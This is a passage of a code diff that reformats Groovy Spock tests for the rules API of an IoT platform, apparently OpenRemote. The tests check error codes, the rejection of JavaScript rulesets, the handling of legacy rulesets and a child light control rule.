+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      true
+    }
+
+    when: "an asset ruleset is updated with an invalid id"
+    assetRuleset.assetId = managerTestSetup.apartment1Id
+    assetRuleset.id = 1234567890l
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      true
+    }
+
+    when: "a non-existent asset ruleset is updated"
+    rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      true
+    }
+
+    when: "an asset ruleset is deleted"
+    rulesetResource.deleteAssetRuleset(null, rulesetId)
+    rulesetResource.getAssetRuleset(null, rulesetId)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      true
+    }
+
+    and: "the ruleset should be removed from the engine"
+    conditions.eventually {
+      assert rulesService.assetEngines.get(managerTestSetup.apartment1Id) == null
+    }
+
+    when: "an asset ruleset is created in the authenticated realm but on a forbidden asset"
+    assetRuleset = new AssetRuleset(managerTestSetup.apartment3Id, "Test asset definition", FLOW, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "an asset ruleset is created in a non-authenticated realm"
+    assetRuleset = new AssetRuleset(managerTestSetup.smartOfficeId, "Test asset definition", FLOW, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+  }
+
+  def "JavaScript ruleset create requests are rejected"() {
+
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the ruleset resource"
-        def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
+    and: "the ruleset resource"
+    def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
 
-        when: "a global JavaScript ruleset is created"
-        rulesetResource.createGlobalRuleset(null, new GlobalRuleset("Test JS global definition", JAVASCRIPT, "SomeRulesCode"))
+    when: "a global JavaScript ruleset is created"
+    rulesetResource.createGlobalRuleset(null, new GlobalRuleset("Test JS global definition", JAVASCRIPT, "SomeRulesCode"))
 
-        then: "the request should be rejected"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
+    then: "the request should be rejected"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
 
-        when: "a realm JavaScript ruleset is created"
-        rulesetResource.createRealmRuleset(null, new RealmRuleset(MASTER_REALM, "Test JS realm definition", JAVASCRIPT, "SomeRulesCode"))
+    when: "a realm JavaScript ruleset is created"
+    rulesetResource.createRealmRuleset(null, new RealmRuleset(MASTER_REALM, "Test JS realm definition", JAVASCRIPT, "SomeRulesCode"))
 
-        then: "the request should be rejected"
-        ex = thrown()
-        ex.response.status == 400
+    then: "the request should be rejected"
+    ex = thrown()
+    ex.response.status == 400
 
-        when: "an asset JavaScript ruleset is created"
-        rulesetResource.createAssetRuleset(null, new AssetRuleset(managerTestSetup.smartOfficeId, "Test JS asset definition", JAVASCRIPT, "SomeRulesCode"))
+    when: "an asset JavaScript ruleset is created"
+    rulesetResource.createAssetRuleset(null, new AssetRuleset(managerTestSetup.smartOfficeId, "Test JS asset definition", JAVASCRIPT, "SomeRulesCode"))
 
-        then: "the request should be rejected"
-        ex = thrown()
-        ex.response.status == 400
-    }
+    then: "the request should be rejected"
+    ex = thrown()
+    ex.response.status == 400
+  }
 
-    def "JavaScript ruleset update requests are rejected"() {
+  def "JavaScript ruleset update requests are rejected"() {
 
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the ruleset resource"
-        def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
+    and: "the ruleset resource"
+    def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
 
-        and: "existing rulesets are stored directly"
-        def globalRuleset = rulesetStorageService.merge(new GlobalRuleset("Test global definition", JSON, "SomeRulesCode"))
-        def realmRuleset = rulesetStorageService.merge(new RealmRuleset(MASTER_REALM, "Test JS realm definition", JAVASCRIPT, "SomeRulesCode"))
-        def assetRuleset = rulesetStorageService.merge(new AssetRuleset(managerTestSetup.smartOfficeId, "Test JS asset definition", JAVASCRIPT, "SomeRulesCode"))
+    and: "existing rulesets are stored directly"
+    def globalRuleset = rulesetStorageService.merge(new GlobalRuleset("Test global definition", JSON, "SomeRulesCode"))
+    def realmRuleset = rulesetStorageService.merge(new RealmRuleset(MASTER_REALM, "Test JS realm definition", JAVASCRIPT, "SomeRulesCode"))
+    def assetRuleset = rulesetStorageService.merge(new AssetRuleset(managerTestSetup.smartOfficeId, "Test JS asset definition", JAVASCRIPT, "SomeRulesCode"))
 
-        when: "a stored global ruleset is updated to JavaScript"
-        def updatedGlobalRuleset = rulesetResource.getGlobalRuleset(null, globalRuleset.id)
-        updatedGlobalRuleset.lang = JAVASCRIPT
-        updatedGlobalRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateGlobalRuleset(null, globalRuleset.id, updatedGlobalRuleset)
+    when: "a stored global ruleset is updated to JavaScript"
+    def updatedGlobalRuleset = rulesetResource.getGlobalRuleset(null, globalRuleset.id)
+    updatedGlobalRuleset.lang = JAVASCRIPT
+    updatedGlobalRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateGlobalRuleset(null, globalRuleset.id, updatedGlobalRuleset)
 
-        then: "the request should be rejected"
-        WebApplicationException ex = thrown()
-        ex.response.status == 400
+    then: "the request should be rejected"
+    WebApplicationException ex = thrown()
+    ex.response.status == 400
 
-        when: "a stored JavaScript realm ruleset is updated to a non-JavaScript language"
-        def updatedRealmRuleset = rulesetResource.getRealmRuleset(null, realmRuleset.id)
-        updatedRealmRuleset.lang = JSON
-        updatedRealmRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateRealmRuleset(null, realmRuleset.id, updatedRealmRuleset)
+    when: "a stored JavaScript realm ruleset is updated to a non-JavaScript language"
+    def updatedRealmRuleset = rulesetResource.getRealmRuleset(null, realmRuleset.id)
+    updatedRealmRuleset.lang = JSON
+    updatedRealmRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateRealmRuleset(null, realmRuleset.id, updatedRealmRuleset)
 
-        then: "the request should be rejected"
-        ex = thrown()
-        ex.response.status == 400
+    then: "the request should be rejected"
+    ex = thrown()
+    ex.response.status == 400
 
-        when: "a stored JavaScript asset ruleset is updated to a non-JavaScript language"
-        def updatedAssetRuleset = rulesetResource.getAssetRuleset(null, assetRuleset.id)
-        updatedAssetRuleset.lang = FLOW
-        updatedAssetRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateAssetRuleset(null, assetRuleset.id, updatedAssetRuleset)
+    when: "a stored JavaScript asset ruleset is updated to a non-JavaScript language"
+    def updatedAssetRuleset = rulesetResource.getAssetRuleset(null, assetRuleset.id)
+    updatedAssetRuleset.lang = FLOW
+    updatedAssetRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateAssetRuleset(null, assetRuleset.id, updatedAssetRuleset)
 
-        then: "the request should be rejected"
-        ex = thrown()
-        ex.response.status == 400
-    }
+    then: "the request should be rejected"
+    ex = thrown()
+    ex.response.status == 400
+  }
 
-    def "Legacy JavaScript rulesets remain readable and deletable"() {
+  def "Legacy JavaScript rulesets remain readable and deletable"() {
 
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the ruleset resource"
-        def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
+    and: "the ruleset resource"
+    def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
 
-        and: "legacy JavaScript rulesets are stored directly"
-        def globalRuleset = rulesetStorageService.merge(new GlobalRuleset("Legacy JS global definition", JAVASCRIPT, "SomeRulesCode"))
-        def realmRuleset = rulesetStorageService.merge(new RealmRuleset(MASTER_REALM, "Legacy JS realm definition", JAVASCRIPT, "SomeRulesCode"))
-        def assetRuleset = rulesetStorageService.merge(new AssetRuleset(managerTestSetup.smartOfficeId, "Legacy JS asset definition", JAVASCRIPT, "SomeRulesCode"))
+    and: "legacy JavaScript rulesets are stored directly"
+    def globalRuleset = rulesetStorageService.merge(new GlobalRuleset("Legacy JS global definition", JAVASCRIPT, "SomeRulesCode"))
+    def realmRuleset = rulesetStorageService.merge(new RealmRuleset(MASTER_REALM, "Legacy JS realm definition", JAVASCRIPT, "SomeRulesCode"))
+    def assetRuleset = rulesetStorageService.merge(new AssetRuleset(managerTestSetup.smartOfficeId, "Legacy JS asset definition", JAVASCRIPT, "SomeRulesCode"))
 
-        when: "legacy JavaScript rulesets are listed"
-        def globalRulesets = rulesetResource.getGlobalRulesets(null, null, false)
-        def realmRulesets = rulesetResource.getRealmRulesets(null, MASTER_REALM, null, false)
-        def assetRulesets = rulesetResource.getAssetRulesets(null, managerTestSetup.smartOfficeId, null, false)
+    when: "legacy JavaScript rulesets are listed"
+    def globalRulesets = rulesetResource.getGlobalRulesets(null, null, false)
+    def realmRulesets = rulesetResource.getRealmRulesets(null, MASTER_REALM, null, false)
+    def assetRulesets = rulesetResource.getAssetRulesets(null, managerTestSetup.smartOfficeId, null, false)
 
-        then: "they remain visible in list endpoints"
-        def listedGlobalRuleset = globalRulesets.find { it.id == globalRuleset.id }
-        def listedRealmRuleset = realmRulesets.find { it.id == realmRuleset.id }
-        def listedAssetRuleset = assetRulesets.find { it.id == assetRuleset.id }
+    then: "they remain visible in list endpoints"
+    def listedGlobalRuleset = globalRulesets.find { it.id == globalRuleset.id }
+    def listedRealmRuleset = realmRulesets.find { it.id == realmRuleset.id }
+    def listedAssetRuleset = assetRulesets.find { it.id == assetRuleset.id }
 
-        listedGlobalRuleset != null
-        listedGlobalRuleset.lang == JAVASCRIPT
-        listedGlobalRuleset.name == "Legacy JS global definition"
-        listedGlobalRuleset.rules == null
+    listedGlobalRuleset != null
+    listedGlobalRuleset.lang == JAVASCRIPT
+    listedGlobalRuleset.name == "Legacy JS global definition"
+    listedGlobalRuleset.rules == null
 
-        listedRealmRuleset != null
-        listedRealmRuleset.lang == JAVASCRIPT
-        listedRealmRuleset.name == "Legacy JS realm definition"
-        listedRealmRuleset.rules == null
+    listedRealmRuleset != null
+    listedRealmRuleset.lang == JAVASCRIPT
+    listedRealmRuleset.name == "Legacy JS realm definition"
+    listedRealmRuleset.rules == null
 
-        listedAssetRuleset != null
-        listedAssetRuleset.lang == JAVASCRIPT
-        listedAssetRuleset.name == "Legacy JS asset definition"
-        listedAssetRuleset.rules == null
+    listedAssetRuleset != null
+    listedAssetRuleset.lang == JAVASCRIPT
+    listedAssetRuleset.name == "Legacy JS asset definition"
+    listedAssetRuleset.rules == null
 
-        when: "legacy JavaScript rulesets are fetched"
-        def fetchedGlobalRuleset = rulesetResource.getGlobalRuleset(null, globalRuleset.id)
-        def fetchedRealmRuleset = rulesetResource.getRealmRuleset(null, realmRuleset.id)
-        def fetchedAssetRuleset = rulesetResource.getAssetRuleset(null, assetRuleset.id)
+    when: "legacy JavaScript rulesets are fetched"
+    def fetchedGlobalRuleset = rulesetResource.getGlobalRuleset(null, globalRuleset.id)
+    def fetchedRealmRuleset = rulesetResource.getRealmRuleset(null, realmRuleset.id)
+    def fetchedAssetRuleset = rulesetResource.getAssetRuleset(null, assetRuleset.id)
 
-        then: "they remain readable through detail endpoints"
-        fetchedGlobalRuleset.lang == JAVASCRIPT
-        fetchedGlobalRuleset.rules == "SomeRulesCode"
-        fetchedRealmRuleset.lang == JAVASCRIPT
-        fetchedRealmRuleset.rules == "SomeRulesCode"
-        fetchedAssetRuleset.lang == JAVASCRIPT
-        fetchedAssetRuleset.rules == "SomeRulesCode"
+    then: "they remain readable through detail endpoints"
+    fetchedGlobalRuleset.lang == JAVASCRIPT
+    fetchedGlobalRuleset.rules == "SomeRulesCode"
+    fetchedRealmRuleset.lang == JAVASCRIPT
+    fetchedRealmRuleset.rules == "SomeRulesCode"
+    fetchedAssetRuleset.lang == JAVASCRIPT
+    fetchedAssetRuleset.rules == "SomeRulesCode"
 
-        when: "legacy JavaScript rulesets are deleted"
-        rulesetResource.deleteGlobalRuleset(null, globalRuleset.id)
-        rulesetResource.deleteRealmRuleset(null, realmRuleset.id)
-        rulesetResource.deleteAssetRuleset(null, assetRuleset.id)
+    when: "legacy JavaScript rulesets are deleted"
+    rulesetResource.deleteGlobalRuleset(null, globalRuleset.id)
+    rulesetResource.deleteRealmRuleset(null, realmRuleset.id)
+    rulesetResource.deleteAssetRuleset(null, assetRuleset.id)
 
-        then: "the delete requests succeed"
-        notThrown(WebApplicationException)
+    then: "the delete requests succeed"
+    notThrown(WebApplicationException)
 
-        when: "a deleted global ruleset is fetched"
-        rulesetResource.getGlobalRuleset(null, globalRuleset.id)
+    when: "a deleted global ruleset is fetched"
+    rulesetResource.getGlobalRuleset(null, globalRuleset.id)
 
-        then: "it is no longer found"
-        WebApplicationException ex = thrown()
-        ex.response.status == 404
+    then: "it is no longer found"
+    WebApplicationException ex = thrown()
+    ex.response.status == 404
 
-        when: "a deleted realm ruleset is fetched"
-        rulesetResource.getRealmRuleset(null, realmRuleset.id)
+    when: "a deleted realm ruleset is fetched"
+    rulesetResource.getRealmRuleset(null, realmRuleset.id)
 
-        then: "it is no longer found"
-        ex = thrown()
-        ex.response.status == 404
+    then: "it is no longer found"
+    ex = thrown()
+    ex.response.status == 404
 
-        when: "a deleted asset ruleset is fetched"
-        rulesetResource.getAssetRuleset(null, assetRuleset.id)
+    when: "a deleted asset ruleset is fetched"
+    rulesetResource.getAssetRuleset(null, assetRuleset.id)
 
-        then: "it is no longer found"
-        ex = thrown()
-        ex.response.status == 404
-    }
+    then: "it is no longer found"
+    ex = thrown()
+    ex.response.status == 404
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/ChildAssetControlRulesTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/ChildAssetControlRulesTest.groovy
@@ -38,124 +38,149 @@ import spock.util.concurrent.PollingConditions
 
 class ChildAssetControlRulesTest extends Specification implements ManagerContainerTrait {
 
-    def "Child asset control rule test"() {
+  def "Child asset control rule test"() {
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
 
-        and: "a light asset and child light assets are added"
-        def parentAsset = new LightAsset("Lights")
+    and: "a light asset and child light assets are added"
+    def parentAsset = new LightAsset("Lights")
             .setId(UniqueIdentifierGenerator.generateId("GroupAssetLights"))
             .setRealm(Constants.MASTER_REALM)
             .addAttributes(
-                new Attribute<?>(LightAsset.ON_OFF).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                new Attribute<>(LightAsset.BRIGHTNESS).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                new Attribute<>(LightAsset.COLOUR_RGB).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                new Attribute<>(LightAsset.COLOUR_TEMPERATURE).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+            new Attribute<?>(LightAsset.ON_OFF).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>(LightAsset.BRIGHTNESS).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>(LightAsset.COLOUR_RGB).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>(LightAsset.COLOUR_TEMPERATURE).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
             )
-        parentAsset = assetStorageService.merge(parentAsset)
+    parentAsset = assetStorageService.merge(parentAsset)
 
-        for (int i=1; i<=100; i++) {
-            def lightAsset = new LightAsset("Light ${i}")
-                .setId(UniqueIdentifierGenerator.generateId("Light ${i}"))
-                .setParent(parentAsset)
+    for (int i = 1; i <= 100; i++) {
+      def lightAsset = new LightAsset("Light ${i}")
+              .setId(UniqueIdentifierGenerator.generateId("Light ${i}"))
+              .setParent(parentAsset)
 
-            lightAsset.getAttribute(LightAsset.ON_OFF).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-            lightAsset.getAttribute(LightAsset.BRIGHTNESS).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-            lightAsset.getAttribute(LightAsset.COLOUR_RGB).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-            lightAsset.getAttribute(LightAsset.COLOUR_TEMPERATURE).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-            lightAsset = assetStorageService.merge(lightAsset)
-        }
+      lightAsset.getAttribute(LightAsset.ON_OFF).ifPresentOrElse(attr -> {
+        attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+      }, null)
+      lightAsset.getAttribute(LightAsset.BRIGHTNESS).ifPresentOrElse(attr -> {
+        attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+      }, null)
+      lightAsset.getAttribute(LightAsset.COLOUR_RGB).ifPresentOrElse(attr -> {
+        attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+      }, null)
+      lightAsset.getAttribute(LightAsset.COLOUR_TEMPERATURE).ifPresentOrElse(attr -> {
+        attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+      }, null)
+      lightAsset = assetStorageService.merge(lightAsset)
+    }
 
-        and: "the child asset control ruleset is added"
-        Ruleset ruleset = new RealmRuleset(
+    and: "the child asset control ruleset is added"
+    Ruleset ruleset = new RealmRuleset(
             Constants.MASTER_REALM,
             "Child asset control",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ChildAssetControl.groovy").text)
-        ruleset = rulesetStorageService.merge(ruleset)
+    ruleset = rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-            assert engine.facts.assetStates.count { it.id == parentAsset.id} == 4
-            assert engine.lastFireTimestamp > ruleset.createdOn.toEpochMilli()
-            assert engine.deployments.get(ruleset.id) != null
-        }
-
-        when: "The on/off attribute of the parent asset is written to"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(parentAsset.id, LightAsset.ON_OFF, true)
-        )
-
-        then: "the parent asset attribute should be updated"
-        conditions.eventually {
-            parentAsset = assetStorageService.find(parentAsset.id, true) as LightAsset
-            assert parentAsset.getAttribute(LightAsset.ON_OFF).flatMap{it.value}.orElse(false)
-        }
-
-        and: "all child lights on/off attributes should now show the same value"
-        conditions.eventually {
-            for (int i=1; i<=100; i++) {
-                def light = assetStorageService.find(UniqueIdentifierGenerator.generateId("Light ${i}"), true) as LightAsset
-                assert light.getOnOff().orElse(false)
-                assert light.getAttribute(LightAsset.ON_OFF).flatMap { it.getTimestamp()}.orElse(0) == parentAsset.getAttribute(LightAsset.ON_OFF).flatMap { it.getTimestamp()}.orElse(-1)
-            }
-        }
-
-        when: "a new child asset is added to the root"
-        def lightAsset = new LightAsset("Light 101")
-                .setId(UniqueIdentifierGenerator.generateId("Light 101"))
-                .setRealm(Constants.MASTER_REALM)
-
-        lightAsset.getAttribute(LightAsset.ON_OFF).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-        lightAsset.getAttribute(LightAsset.BRIGHTNESS).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-        lightAsset.getAttribute(LightAsset.COLOUR_RGB).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-        lightAsset.getAttribute(LightAsset.COLOUR_TEMPERATURE).ifPresentOrElse(attr -> {attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))}, null)
-        lightAsset.getAttribute(LightAsset.ON_OFF).ifPresent { it.setValue(true)}
-        lightAsset = assetStorageService.merge(lightAsset)
-
-        then: "the child asset states should be loaded into the rule engine"
-        conditions.eventually {
-            assert engine.facts.assetStates.count { it.id == lightAsset.id} == 4
-        }
-
-        when: "the child asset is moved under the group parent"
-        lightAsset.setParent(parentAsset)
-        lightAsset = assetStorageService.merge(lightAsset)
-
-        then: "the child asset states should be loaded into the rule engine"
-        conditions.eventually {
-            assert engine.facts.assetStates.count { it.id == lightAsset.id && it.parentId == parentAsset.id} == 4
-        }
-
-        when: "The on/off attribute of the parent asset is written to"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(parentAsset.id, LightAsset.ON_OFF, false)
-        )
-
-        then: "the parent asset attribute should be updated"
-        conditions.eventually {
-            parentAsset = assetStorageService.find(parentAsset.id, true) as LightAsset
-            assert !parentAsset.getAttribute(LightAsset.ON_OFF).flatMap{it.value}.orElse(true)
-        }
-
-        and: "all child lights on/off attributes should now show the same value"
-        conditions.eventually {
-            for (int i=1; i<=101; i++) {
-                def light = assetStorageService.find(UniqueIdentifierGenerator.generateId("Light ${i}"), true) as LightAsset
-                assert !light.getOnOff().orElse(true)
-                assert light.getAttribute(LightAsset.ON_OFF).flatMap { it.getTimestamp()}.orElse(0) == parentAsset.getAttribute(LightAsset.ON_OFF).flatMap { it.getTimestamp()}.orElse(-1)
-            }
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+      assert engine.facts.assetStates.count { it.id == parentAsset.id} == 4
+      assert engine.lastFireTimestamp> ruleset.createdOn.toEpochMilli()
+      assert engine.deployments.get(ruleset.id) != null
     }
 
+    when: "The on/off attribute of the parent asset is written to"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(parentAsset.id, LightAsset.ON_OFF, true)
+            )
+
+    then: "the parent asset attribute should be updated"
+    conditions.eventually {
+      parentAsset = assetStorageService.find(parentAsset.id, true) as LightAsset
+      assert parentAsset.getAttribute(LightAsset.ON_OFF).flatMap{it.value}.orElse(false)
+    }
+
+    and: "all child lights on/off attributes should now show the same value"
+    conditions.eventually {
+      for (int i = 1; i <= 100; i++) {
+        def light = assetStorageService.find(UniqueIdentifierGenerator.generateId("Light ${i}"), true) as LightAsset
+        assert light.getOnOff().orElse(false)
+        assert light.getAttribute(LightAsset.ON_OFF).flatMap {
+          it.getTimestamp()
+        }.orElse(0) == parentAsset.getAttribute(LightAsset.ON_OFF).flatMap {
+          it.getTimestamp()
+        }.orElse(-1)
+      }
+    }
+
+    when: "a new child asset is added to the root"
+    def lightAsset = new LightAsset("Light 101")
+            .setId(UniqueIdentifierGenerator.generateId("Light 101"))
+            .setRealm(Constants.MASTER_REALM)
+
+    lightAsset.getAttribute(LightAsset.ON_OFF).ifPresentOrElse(attr -> {
+      attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    }, null)
+    lightAsset.getAttribute(LightAsset.BRIGHTNESS).ifPresentOrElse(attr -> {
+      attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    }, null)
+    lightAsset.getAttribute(LightAsset.COLOUR_RGB).ifPresentOrElse(attr -> {
+      attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    }, null)
+    lightAsset.getAttribute(LightAsset.COLOUR_TEMPERATURE).ifPresentOrElse(attr -> {
+      attr.addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    }, null)
+    lightAsset.getAttribute(LightAsset.ON_OFF).ifPresent { it.setValue(true)}
+    lightAsset = assetStorageService.merge(lightAsset)
+
+    then: "the child asset states should be loaded into the rule engine"
+    conditions.eventually {
+      assert engine.facts.assetStates.count { it.id == lightAsset.id} == 4
+    }
+
+    when: "the child asset is moved under the group parent"
+    lightAsset.setParent(parentAsset)
+    lightAsset = assetStorageService.merge(lightAsset)
+
+    then: "the child asset states should be loaded into the rule engine"
+    conditions.eventually {
+      assert engine.facts.assetStates.count {
+        it.id == lightAsset.id && it.parentId == parentAsset.id
+      } == 4
+    }
+
+    when: "The on/off attribute of the parent asset is written to"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(parentAsset.id, LightAsset.ON_OFF, false)
+            )
+
+    then: "the parent asset attribute should be updated"
+    conditions.eventually {
+      parentAsset = assetStorageService.find(parentAsset.id, true) as LightAsset
+      assert !parentAsset.getAttribute(LightAsset.ON_OFF).flatMap{it.value}.orElse(true)
+    }
+
+    and: "all child lights on/off attributes should now show the same value"
+    conditions.eventually {
+      for (int i = 1; i <= 101; i++) {
+        def light = assetStorageService.find(UniqueIdentifierGenerator.generateId("Light ${i}"), true) as LightAsset
+        assert !light.getOnOff().orElse(true)
+        assert light.getAttribute(LightAsset.ON_OFF).flatMap {
+          it.getTimestamp()
+        }.orElse(0) == parentAsset.getAttribute(LightAsset.ON_OFF).flatMap {
+          it.getTimestamp()
+        }.orElse(-1)
+      }
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/GroovyRulesRuntimeTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/GroovyRulesRuntimeTest.groovy
@@ -34,9 +34,9 @@ import static org.openremote.model.rules.RulesetStatus.DISABLED
 
 class GroovyRulesRuntimeTest extends Specification implements ManagerContainerTrait {
 
-    private static final String OR_RULES_GROOVY_EXECUTION_ENABLED = "OR_RULES_GROOVY_EXECUTION_ENABLED"
+  private static final String OR_RULES_GROOVY_EXECUTION_ENABLED = "OR_RULES_GROOVY_EXECUTION_ENABLED"
 
-    private static final String MODULO_RULE = '''
+  private static final String MODULO_RULE = '''
         package demo.rules
 
         rules.add()
@@ -52,76 +52,76 @@ class GroovyRulesRuntimeTest extends Specification implements ManagerContainerTr
         })
     '''.stripIndent()
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Groovy modulo operator evaluates during rule execution"() {
-        given: "the container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def config = defaultConfig()
-        config[OR_RULES_QUICK_FIRE_MILLIS] = "60000"
-        def container = startContainer(config, defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+  @SuppressWarnings("GroovyAccessibility")
+  def "Groovy modulo operator evaluates during rule execution"() {
+    given: "the container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def config = defaultConfig()
+    config[OR_RULES_QUICK_FIRE_MILLIS] = "60000"
+    def container = startContainer(config, defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
 
-        and: "a Groovy ruleset uses the modulo operator in a condition"
-        def ruleset = rulesetStorageService.merge(new RealmRuleset(
